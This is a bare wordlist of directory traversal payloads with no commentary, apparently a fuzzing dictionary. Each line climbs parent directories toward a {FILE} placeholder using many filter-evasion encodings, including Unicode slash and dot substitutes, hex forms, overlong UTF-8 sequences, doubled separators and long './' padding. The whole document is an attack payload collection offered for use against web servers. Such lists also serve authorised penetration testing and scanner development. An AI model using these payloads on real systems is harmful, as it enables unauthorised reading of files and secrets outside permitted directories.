....\....\....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\....\....\{FILE}&lt;br /&gt;
........................................................................../{FILE}&lt;br /&gt;
........................................................................../../{FILE}&lt;br /&gt;
........................................................................../../../{FILE}&lt;br /&gt;
........................................................................../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../../../{FILE}&lt;br /&gt;
..........................................................................\{FILE}&lt;br /&gt;
..........................................................................\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
///%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
\\\%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..//{FILE}&lt;br /&gt;
..//..//{FILE}&lt;br /&gt;
..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
..///..///{FILE}&lt;br /&gt;
..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..\\{FILE}&lt;br /&gt;
..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
